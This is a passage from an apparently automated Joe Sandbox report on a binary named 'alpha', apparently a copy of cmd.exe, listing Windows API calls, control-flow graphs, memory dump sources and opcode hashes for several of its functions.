                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F69
                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F95
                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FB0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FC1
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FD8
                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FF8
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495037
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49504B
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950DF
                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950F2
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49510F
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495130
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49514A
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495175
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                        • API String ID: 1049357271-3021193919
                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction ID: 84ee1871a17f2f0a977d3808aa3ffb817d6d8cbd0e53727e1156c100f72dfefc
                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction Fuzzy Hash: 8BC14121B0CA4296EA04BF52E814579F6A6FF89BA0FC48135DF2E43755FF3CA6458320
                                        Function 00007FF7CD493C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 732 7ff7cd493c24-7ff7cd493c61 733 7ff7cd493c67-7ff7cd493c99 call 7ff7cd48af14 call 7ff7cd48ca40 732->733 734 7ff7cd49ec5a-7ff7cd49ec5f 732->734 743 7ff7cd493c9f-7ff7cd493cb2 call 7ff7cd48b900 733->743 744 7ff7cd49ec97-7ff7cd49eca1 call 7ff7cd49855c 733->744 734->733 736 7ff7cd49ec65-7ff7cd49ec6a 734->736 738 7ff7cd49412e-7ff7cd49415b call 7ff7cd498f80 736->738 743->744 749 7ff7cd493cb8-7ff7cd493cbc 743->749 750 7ff7cd493cbf-7ff7cd493cc7 749->750 750->750 751 7ff7cd493cc9-7ff7cd493ccd 750->751 752 7ff7cd493cd2-7ff7cd493cd8 751->752 753 7ff7cd493ce5-7ff7cd493d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7cd493cda-7ff7cd493cdf 752->754 756 7ff7cd493fb8 753->756 757 7ff7cd493d68-7ff7cd493d6c 753->757 754->753 755 7ff7cd493faa-7ff7cd493fb3 754->755 755->752 759 7ff7cd493fc6-7ff7cd493fec GetLastError call 7ff7cd49855c call 7ff7cd49a5d6 756->759 757->756 758 7ff7cd493d72-7ff7cd493dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7cd493dd3-7ff7cd493ddd 758->760 762 7ff7cd493ff1-7ff7cd494007 call 7ff7cd49855c _local_unwind 759->762 760->762 763 7ff7cd493de3-7ff7cd493dfb 760->763 774 7ff7cd49400c-7ff7cd494022 GetLastError 762->774 765 7ff7cd493e01-7ff7cd493e11 763->765 766 7ff7cd4940fe-7ff7cd494119 call 7ff7cd49855c _local_unwind 763->766 765->766 770 7ff7cd493e17-7ff7cd493e28 765->770 775 7ff7cd49411a-7ff7cd49412c call 7ff7cd48ff70 call 7ff7cd49855c 766->775 773 7ff7cd493e2c-7ff7cd493e34 770->773 773->773 776 7ff7cd493e36-7ff7cd493e3f 773->776 777 7ff7cd493e95-7ff7cd493e9c 774->777 778 7ff7cd494028-7ff7cd49402b 774->778 775->738 782 7ff7cd493e42-7ff7cd493e55 776->782 779 7ff7cd493ecf-7ff7cd493ed3 777->779 780 7ff7cd493e9e-7ff7cd493ec2 call 7ff7cd492978 777->780 778->777 783 7ff7cd494031-7ff7cd494047 call 7ff7cd49855c _local_unwind 778->783 785 7ff7cd493ed5-7ff7cd493ef7 GetFileAttributesW 779->785 786 7ff7cd493f08-7ff7cd493f0b 779->786 792 7ff7cd493ec7-7ff7cd493ec9 780->792 788 7ff7cd493e66-7ff7cd493e8f GetFileAttributesW 782->788 789 7ff7cd493e57-7ff7cd493e60 782->789 799 7ff7cd49404c-7ff7cd494062 call 7ff7cd49855c _local_unwind 783->799 793 7ff7cd494067-7ff7cd494098 GetLastError call 7ff7cd49855c _local_unwind 785->793 794 7ff7cd493efd-7ff7cd493f02 785->794 796 7ff7cd493f0d-7ff7cd493f11 786->796 797 7ff7cd493f1e-7ff7cd493f40 SetCurrentDirectoryW 786->797 788->774 788->777 789->788 798 7ff7cd493f9d-7ff7cd493fa5 789->798 792->779 792->799 801 7ff7cd49409d-7ff7cd4940b3 call 7ff7cd49855c _local_unwind 793->801 794->786 794->801 803 7ff7cd493f13-7ff7cd493f1c 796->803 804 7ff7cd493f46-7ff7cd493f69 call 7ff7cd49498c 796->804 797->804 805 7ff7cd4940b8-7ff7cd4940de GetLastError call 7ff7cd49855c _local_unwind 797->805 798->782 799->793 801->805 803->797 803->804 815 7ff7cd4940e3-7ff7cd4940f9 call 7ff7cd49855c _local_unwind 804->815 816 7ff7cd493f6f-7ff7cd493f98 call 7ff7cd49417c 804->816 805->815 815->766 816->775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                        • String ID: :
                                        • API String ID: 1809961153-336475711
                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction ID: 429529aa4d0ebf8d1ce851f9278bb34ec020735cdf6d6dc2704783c09c140e57
                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction Fuzzy Hash: 01D17D2270CB8191EA60AF16E4486B9F7A6FB85760F844135DF5E436A8FF3CE645CB10
                                        Function 00007FF7CD492394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 914 7ff7cd492394-7ff7cd492416 memset call 7ff7cd48ca40 917 7ff7cd49e0d2-7ff7cd49e0da call 7ff7cd494c1c 914->917 918 7ff7cd49241c-7ff7cd492453 GetModuleFileNameW call 7ff7cd49081c 914->918 924 7ff7cd49e0db-7ff7cd49e0ee call 7ff7cd49498c 917->924 923 7ff7cd492459-7ff7cd492468 call 7ff7cd49081c 918->923 918->924 929 7ff7cd49e0f4-7ff7cd49e107 call 7ff7cd49498c 923->929 930 7ff7cd49246e-7ff7cd49247d call 7ff7cd49081c 923->930 924->929 937 7ff7cd49e10d-7ff7cd49e123 929->937 935 7ff7cd492483-7ff7cd492492 call 7ff7cd49081c 930->935 936 7ff7cd492516-7ff7cd492529 call 7ff7cd49498c 930->936 935->937 947 7ff7cd492498-7ff7cd4924a7 call 7ff7cd49081c 935->947 936->935 940 7ff7cd49e13f-7ff7cd49e17a _wcsupr 937->940 941 7ff7cd49e125-7ff7cd49e139 wcschr 937->941 945 7ff7cd49e181-7ff7cd49e199 wcsrchr 940->945 946 7ff7cd49e17c-7ff7cd49e17f 940->946 941->940 944 7ff7cd49e27c 941->944 949 7ff7cd49e283-7ff7cd49e29b call 7ff7cd49498c 944->949 948 7ff7cd49e19c 945->948 946->948 956 7ff7cd49e2a1-7ff7cd49e2c3 _wcsicmp 947->956 957 7ff7cd4924ad-7ff7cd4924c5 call 7ff7cd493c24 947->957 951 7ff7cd49e1a0-7ff7cd49e1a7 948->951 949->956 951->951 954 7ff7cd49e1a9-7ff7cd49e1bb 951->954 958 7ff7cd49e1c1-7ff7cd49e1e6 954->958 959 7ff7cd49e264-7ff7cd49e277 call 7ff7cd491300 954->959 964 7ff7cd4924ca-7ff7cd4924db 957->964 962 7ff7cd49e1e8-7ff7cd49e1f1 958->962 963 7ff7cd49e21a 958->963 959->944 966 7ff7cd49e201-7ff7cd49e210 962->966 967 7ff7cd49e1f3-7ff7cd49e1f6 962->967 965 7ff7cd49e21d-7ff7cd49e21f 963->965 968 7ff7cd4924e9-7ff7cd492514 call 7ff7cd498f80 964->968 969 7ff7cd4924dd-7ff7cd4924e4 ??_V@YAXPEAX@Z 964->969 965->949 970 7ff7cd49e221-7ff7cd49e228 965->970 966->963 973 7ff7cd49e212-7ff7cd49e218 966->973 967->966 972 7ff7cd49e1f8-7ff7cd49e1ff 967->972 969->968 974 7ff7cd49e254-7ff7cd49e262 970->974 975 7ff7cd49e22a-7ff7cd49e231 970->975 972->966 972->967 973->965 974->944 977 7ff7cd49e234-7ff7cd49e237 975->977 977->974 978 7ff7cd49e239-7ff7cd49e242 977->978 978->974 979 7ff7cd49e244-7ff7cd49e252 978->979 979->974 979->977
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                        • API String ID: 2622545777-4197029667
                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction ID: cc76b106986b887df7b32274dd9022eca5032ce636882b52ebf2766c3929e07b
                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction Fuzzy Hash: B4917F21B0DA4295EE24AF52D854AB8A3A6FF58B64FC44135CF6E47295FE3CE704C720
                                        Function 00007FF7CD490580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID: CMD.EXE
                                        • API String ID: 1606018815-3025314500
                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction ID: 29a60f4e52564ba105571b9adc3b067fd57fdd59db2a4144ebf9c66fae0487ad
                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction Fuzzy Hash: DB41CC31B0DA02DBE604AF55E855578BBA1BB99771FC89179CF2E42360EF3DA604C620
                                        Function 00007FF7CD48C620 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 312COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 992 7ff7cd48c620-7ff7cd48c66f GetConsoleTitleW 993 7ff7cd49c5f2 992->993 994 7ff7cd48c675-7ff7cd48c687 call 7ff7cd48af14 992->994 997 7ff7cd49c5fc-7ff7cd49c60c GetLastError 993->997 998 7ff7cd48c689 994->998 999 7ff7cd48c68e-7ff7cd48c69d call 7ff7cd48ca40 994->999 1000 7ff7cd49c5e3 call 7ff7cd483278 997->1000 998->999 1004 7ff7cd49c5e8-7ff7cd49c5ed call 7ff7cd49855c 999->1004 1005 7ff7cd48c6a3-7ff7cd48c6ac 999->1005 1000->1004 1004->993 1007 7ff7cd48c6b2-7ff7cd48c6c5 call 7ff7cd48b9c0 1005->1007 1008 7ff7cd48c954-7ff7cd48c95e call 7ff7cd49291c 1005->1008 1015 7ff7cd48c9b5-7ff7cd48c9b8 call 7ff7cd495c6c 1007->1015 1016 7ff7cd48c6cb-7ff7cd48c6ce 1007->1016 1013 7ff7cd48c964-7ff7cd48c972 call 7ff7cd4889c0 1008->1013 1014 7ff7cd49c5de-7ff7cd49c5e0 1008->1014 1013->997 1028 7ff7cd48c978-7ff7cd48c99a towupper 1013->1028 1014->1000 1020 7ff7cd48c9bd-7ff7cd48c9c9 call 7ff7cd49855c 1015->1020 1016->1004 1019 7ff7cd48c6d4-7ff7cd48c6e9 1016->1019 1022 7ff7cd48c6ef-7ff7cd48c6fa 1019->1022 1023 7ff7cd49c616-7ff7cd49c620 call 7ff7cd49855c 1019->1023 1039 7ff7cd48c9d0-7ff7cd48c9d7 1020->1039 1024 7ff7cd48c700-7ff7cd48c713 1022->1024 1025 7ff7cd49c627 1022->1025 1023->1025 1029 7ff7cd49c631 1024->1029 1030 7ff7cd48c719-7ff7cd48c72c 1024->1030 1025->1029 1033 7ff7cd48c9a0-7ff7cd48c9a9 1028->1033 1035 7ff7cd49c63b 1029->1035 1034 7ff7cd48c732-7ff7cd48c747 call 7ff7cd48d3f0 1030->1034 1030->1035 1033->1033 1036 7ff7cd48c9ab-7ff7cd48c9af 1033->1036 1045 7ff7cd48c8ac-7ff7cd48c8af 1034->1045 1046 7ff7cd48c74d-7ff7cd48c750 1034->1046 1043 7ff7cd49c645 1035->1043 1036->1015 1037 7ff7cd49c60e-7ff7cd49c611 call 7ff7cd4aec14 1036->1037 1037->1023 1041 7ff7cd48c872-7ff7cd48c8aa call 7ff7cd49855c call 7ff7cd498f80 1039->1041 1042 7ff7cd48c9dd-7ff7cd49c6da SetConsoleTitleW 1039->1042 1042->1041 1053 7ff7cd49c64e-7ff7cd49c651 1043->1053 1045->1046 1052 7ff7cd48c8b5-7ff7cd48c8d3 wcsncmp 1045->1052 1049 7ff7cd48c752-7ff7cd48c764 call 7ff7cd48bd38 1046->1049 1050 7ff7cd48c76a-7ff7cd48c76d 1046->1050 1049->1004 1049->1050 1056 7ff7cd48c840-7ff7cd48c84b call 7ff7cd48cb40 1050->1056 1057 7ff7cd48c773-7ff7cd48c77a 1050->1057 1052->1050 1058 7ff7cd48c8d9 1052->1058 1059 7ff7cd49c657-7ff7cd49c65b 1053->1059 1060 7ff7cd48c80d-7ff7cd48c811 1053->1060 1078 7ff7cd48c856-7ff7cd48c86c 1056->1078 1079 7ff7cd48c84d-7ff7cd48c855 call 7ff7cd48cad4 1056->1079 1065 7ff7cd48c780-7ff7cd48c784 1057->1065 1058->1046 1059->1060 1061 7ff7cd48c9e2-7ff7cd48c9e7 1060->1061 1062 7ff7cd48c817-7ff7cd48c81b 1060->1062 1061->1062 1069 7ff7cd48c9ed-7ff7cd48c9f7 call 7ff7cd49291c 1061->1069 1067 7ff7cd48c821 1062->1067 1068 7ff7cd48ca1b-7ff7cd48ca1f 1062->1068 1070 7ff7cd48c78a-7ff7cd48c7a4 wcschr 1065->1070 1071 7ff7cd48c83d 1065->1071 1074 7ff7cd48c824-7ff7cd48c82d 1067->1074 1068->1067 1073 7ff7cd48ca25-7ff7cd49c6b3 call 7ff7cd483278 1068->1073 1089 7ff7cd49c684-7ff7cd49c698 call 7ff7cd483278 1069->1089 1090 7ff7cd48c9fd-7ff7cd48ca00 1069->1090 1076 7ff7cd48c7aa-7ff7cd48c7ad 1070->1076 1077 7ff7cd48c8de-7ff7cd48c8f7 1070->1077 1071->1056 1073->1004 1074->1074 1082 7ff7cd48c82f-7ff7cd48c837 1074->1082 1084 7ff7cd48c7b0-7ff7cd48c7b8 1076->1084 1085 7ff7cd48c900-7ff7cd48c908 1077->1085 1078->1039 1078->1041 1079->1078 1082->1065 1082->1071 1084->1084 1091 7ff7cd48c7ba-7ff7cd48c7c7 1084->1091 1085->1085 1092 7ff7cd48c90a-7ff7cd48c915 1085->1092 1089->1004 1090->1062 1098 7ff7cd48ca06-7ff7cd48ca10 call 7ff7cd4889c0 1090->1098 1091->1053 1093 7ff7cd48c7cd-7ff7cd48c7db 1091->1093 1094 7ff7cd48c917 1092->1094 1095 7ff7cd48c93a-7ff7cd48c944 1092->1095 1099 7ff7cd48c7e0-7ff7cd48c7e7 1093->1099 1100 7ff7cd48c920-7ff7cd48c928 1094->1100 1102 7ff7cd48ca2a-7ff7cd48ca2f call 7ff7cd499158 1095->1102 1103 7ff7cd48c94a 1095->1103 1098->1062 1111 7ff7cd48ca16-7ff7cd49c67f GetLastError call 7ff7cd483278 1098->1111 1105 7ff7cd48c800-7ff7cd48c803 1099->1105 1106 7ff7cd48c7e9-7ff7cd48c7f1 1099->1106 1107 7ff7cd48c932-7ff7cd48c938 1100->1107 1108 7ff7cd48c92a-7ff7cd48c92f 1100->1108 1102->1014 1103->1008 1105->1043 1113 7ff7cd48c809 1105->1113 1106->1105 1112 7ff7cd48c7f3-7ff7cd48c7fe 1106->1112 1107->1095 1107->1100 1108->1107 1111->1004 1112->1099 1112->1105 1113->1060
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitlewcschr
                                        • String ID: /$:$C:\Users\user\Desktop
                                        • API String ID: 2364928044-1365500999
                                        • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                        • Instruction ID: 8f571fb85f9a1f73d9cef481c7cdf4a233d53ae82f206b9040e91fb5fa649a2a
                                        • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                        • Instruction Fuzzy Hash: 20C17E61B0C64281EA54BF16D814679E2A2EF90BB0FC45131DF6E872D5FF3CEA448720
                                        Function 00007FF7CD498D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1171 7ff7cd498d80-7ff7cd498da2 1172 7ff7cd498da4-7ff7cd498daf 1171->1172 1173 7ff7cd498db1-7ff7cd498db4 1172->1173 1174 7ff7cd498dcc 1172->1174 1175 7ff7cd498dbf-7ff7cd498dca Sleep 1173->1175 1176 7ff7cd498db6-7ff7cd498dbd 1173->1176 1177 7ff7cd498dd1-7ff7cd498dd9 1174->1177 1175->1172 1176->1177 1178 7ff7cd498de7-7ff7cd498def 1177->1178 1179 7ff7cd498ddb-7ff7cd498de5 _amsg_exit 1177->1179 1181 7ff7cd498df1-7ff7cd498e0a 1178->1181 1182 7ff7cd498e46 1178->1182 1180 7ff7cd498e4c-7ff7cd498e54 1179->1180 1184 7ff7cd498e73-7ff7cd498e75 1180->1184 1185 7ff7cd498e56-7ff7cd498e69 _initterm 1180->1185 1183 7ff7cd498e0e-7ff7cd498e11 1181->1183 1182->1180 1186 7ff7cd498e13-7ff7cd498e15 1183->1186 1187 7ff7cd498e38-7ff7cd498e3a 1183->1187 1188 7ff7cd498e80-7ff7cd498e88 1184->1188 1189 7ff7cd498e77-7ff7cd498e79 1184->1189 1185->1184 1192 7ff7cd498e17-7ff7cd498e1b 1186->1192 1193 7ff7cd498e3c-7ff7cd498e41 1186->1193 1187->1180 1187->1193 1190 7ff7cd498eb4-7ff7cd498ec8 call 7ff7cd4937d8 1188->1190 1191 7ff7cd498e8a-7ff7cd498e98 call 7ff7cd4994f0 1188->1191 1189->1188 1200 7ff7cd498ecd-7ff7cd498eda 1190->1200 1191->1190 1201 7ff7cd498e9a-7ff7cd498eaa 1191->1201 1195 7ff7cd498e2d-7ff7cd498e36 1192->1195 1196 7ff7cd498e1d-7ff7cd498e29 1192->1196 1198 7ff7cd498f28-7ff7cd498f3d 1193->1198 1195->1183 1196->1195 1203 7ff7cd498ee4-7ff7cd498eeb 1200->1203 1204 7ff7cd498edc-7ff7cd498ede exit 1200->1204 1201->1190 1205 7ff7cd498ef9 1203->1205 1206 7ff7cd498eed-7ff7cd498ef3 _cexit 1203->1206 1204->1203 1205->1198 1206->1205
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                        • String ID:
                                        • API String ID: 4291973834-0
                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction ID: 1ffb054e2dd3121d3e0774b0eddbd44d01c492bf22b47cf440d3cf454bdddd57
